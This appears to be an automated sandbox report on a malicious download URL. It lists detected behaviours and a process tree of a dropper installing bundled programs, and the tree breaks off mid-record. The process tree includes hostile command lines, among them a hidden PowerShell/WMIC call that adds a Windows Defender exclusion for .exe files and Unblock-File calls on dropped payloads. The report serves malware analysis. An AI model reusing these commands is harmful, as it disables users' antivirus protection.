Analysis

  • max time kernel
    389s
  • max time network
    395s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16-07-2024 05:11

General

  • Target

    https://ify.ac/1IZk

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 21 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 62 IoCs
  • NSIS installer 2 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\LaunchWinApp.exe
    "C:\Windows\system32\LaunchWinApp.exe" "https://ify.ac/1IZk"
    1⤵
      PID:4764
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:4444
    • C:\Windows\system32\browser_broker.exe
      C:\Windows\system32\browser_broker.exe -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • NTFS ADS
      PID:228
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5004
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:1612
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      PID:4240
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      PID:4560
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:1844
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:4456
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      PID:4472
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:2944
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:2992
      • C:\Users\Admin\Desktop\setup_bQFFnFHGSf.exe
        "C:\Users\Admin\Desktop\setup_bQFFnFHGSf.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:4480
        • C:\Users\Admin\AppData\Local\Temp\is-EMQ60.tmp\setup_bQFFnFHGSf.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-EMQ60.tmp\setup_bQFFnFHGSf.tmp" /SL5="$3042A,6120275,56832,C:\Users\Admin\Desktop\setup_bQFFnFHGSf.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4376
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
            3⤵
              PID:4300
            • C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
              "C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" b8c38ab23cb29b463990bcb44875ebb1
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:1788
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 820
                4⤵
                • Program crash
                PID:3688
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 796
                4⤵
                • Program crash
                PID:4808
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 840
                4⤵
                • Program crash
                PID:3516
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 964
                4⤵
                • Program crash
                PID:2264
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 996
                4⤵
                • Program crash
                PID:3256
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1020
                4⤵
                • Program crash
                PID:2776
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1128
                4⤵
                • Program crash
                PID:340
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1180
                4⤵
                • Program crash
                PID:1888
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1232
                4⤵
                • Program crash
                PID:2708
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1252
                4⤵
                • Program crash
                PID:4760
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1276
                4⤵
                • Program crash
                PID:1180
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1228
                4⤵
                • Program crash
                PID:4396
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1164
                4⤵
                • Program crash
                PID:3676
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1664
                4⤵
                • Program crash
                PID:2368
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1696
                4⤵
                • Program crash
                PID:1332
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1804
                4⤵
                • Program crash
                PID:1376
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1988
                4⤵
                • Program crash
                PID:1360
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1844
                4⤵
                • Program crash
                PID:3280
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1808
                4⤵
                • Program crash
                PID:4584
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1184
                4⤵
                • Program crash
                PID:5008
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1880
                4⤵
                • Program crash
                PID:4748
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1664
                4⤵
                • Program crash
                PID:3104
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1948
                4⤵
                • Program crash
                PID:232
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 824
                4⤵
                • Program crash
                PID:1376
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2064
                4⤵
                • Program crash
                PID:3280
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2140
                4⤵
                • Program crash
                PID:4620
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2168
                4⤵
                • Program crash
                PID:1552
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1820
                4⤵
                • Program crash
                PID:2096
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2112
                4⤵
                • Program crash
                PID:196
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2184
                4⤵
                • Program crash
                PID:5064
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2108
                4⤵
                • Program crash
                PID:1716
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1532
                4⤵
                • Program crash
                PID:4556
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2220
                4⤵
                • Program crash
                PID:332
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1872
                4⤵
                • Program crash
                PID:4668
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2276
                4⤵
                • Program crash
                PID:3184
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2336
                4⤵
                • Program crash
                PID:4268
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2404
                4⤵
                • Program crash
                PID:3680
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe"
                4⤵
                  PID:4276
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe"
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2320
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe"
                  4⤵
                    PID:1528
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe"
                      5⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2904
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2508
                    4⤵
                    • Program crash
                    PID:3104
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2576
                    4⤵
                    • Program crash
                    PID:4572
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe"
                    4⤵
                      PID:196
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe"
                        5⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3512
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2260
                      4⤵
                      • Program crash
                      PID:3272
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2304
                      4⤵
                      • Program crash
                      PID:3068
                    • C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe
                      C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe
                      4⤵
                      • Executes dropped EXE
                      PID:1860
                      • C:\Users\Admin\AppData\Local\Temp\is-ITVKJ.tmp\PIPT5ys120HSNpWQJCG.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-ITVKJ.tmp\PIPT5ys120HSNpWQJCG.tmp" /SL5="$3033E,4415326,54272,C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe"
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of FindShellTrayWindow
                        PID:2208
                        • C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
                          "C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -i
                          6⤵
                          • Executes dropped EXE
                          PID:2348
                        • C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
                          "C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -s
                          6⤵
                          • Executes dropped EXE
                          PID:3944
                    • C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe
                      C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe /sid=3 /pid=1090
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1792
                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:5928
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2376
                      4⤵
                      • Program crash
                      PID:3752
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2212
                      4⤵
                      • Program crash
                      PID:4748
                    • C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe
                      C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe --silent --allusers=0
                      4⤵
                      • Executes dropped EXE
                      PID:2956
                      • C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
                        C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe --silent --allusers=0 --server-tracking-blob=MWQ2MDgwMGU2ZWQwM2MwN2IxZThmNjYyM2ViOGRmYTA5OTgyY2M3OWJjODE3ZWQxYjFlZDE4N2FkMjEwZmJjYjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjExMDY4ODkuNzk4NiIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiY2M5NjA1YjMtNGMwYS00ZTYyLWEzNjItZTJkZmM2ZGRmMjA0In0=
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates connected drives
                        • Modifies system certificate store
                        PID:1456
                        • C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
                          C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2d4,0x304,0x6f6db1f4,0x6f6db200,0x6f6db20c
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:208
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:4584
                        • C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1456 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240716051500" --session-guid=2aaf9e2d-2803-4c30-aa74-1618091f706b --server-tracking-blob=MDY0YzFlMjAzMDIxMzgyZGRkMzA4NThjOTBmNGFiNDhhZjBiMTNhZjU3MjgyYTY3YmZlNWQ5ZmQ2Mzg5MDI2Njp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMTEwNjg4OS43OTg2IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiJjYzk2MDViMy00YzBhLTRlNjItYTM2Mi1lMmRmYzZkZGYyMDQifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=C404000000000000
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Enumerates connected drives
                          PID:3040
                          • C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
                            C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x304,0x308,0x30c,0x2d4,0x310,0x6c80b1f4,0x6c80b200,0x6c80b20c
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:5172
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:5852
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe" --version
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:6072
                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x1529f88,0x1529f94,0x1529fa0
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:3684
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2472
                      4⤵
                      • Program crash
                      PID:3520
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe"
                      4⤵
                        PID:1716
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          5⤵
                            PID:2320
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe"
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2904
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2520
                          4⤵
                          • Program crash
                          PID:460
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2060
                          4⤵
                          • Program crash
                          PID:340
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2160
                          4⤵
                          • Program crash
                          PID:836
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2428
                          4⤵
                          • Program crash
                          PID:460
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2532
                          4⤵
                          • Program crash
                          PID:5356
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2396
                          4⤵
                          • Program crash
                          PID:5484
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2524
                          4⤵
                          • Program crash
                          PID:5528
                        • C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe
                          C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe /did=757674 /S
                          4⤵
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Enumerates system info in registry
                          PID:5576
                          • C:\Windows\SysWOW64\forfiles.exe
                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                            5⤵
                              PID:5792
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                6⤵
                                  PID:5836
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5848
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
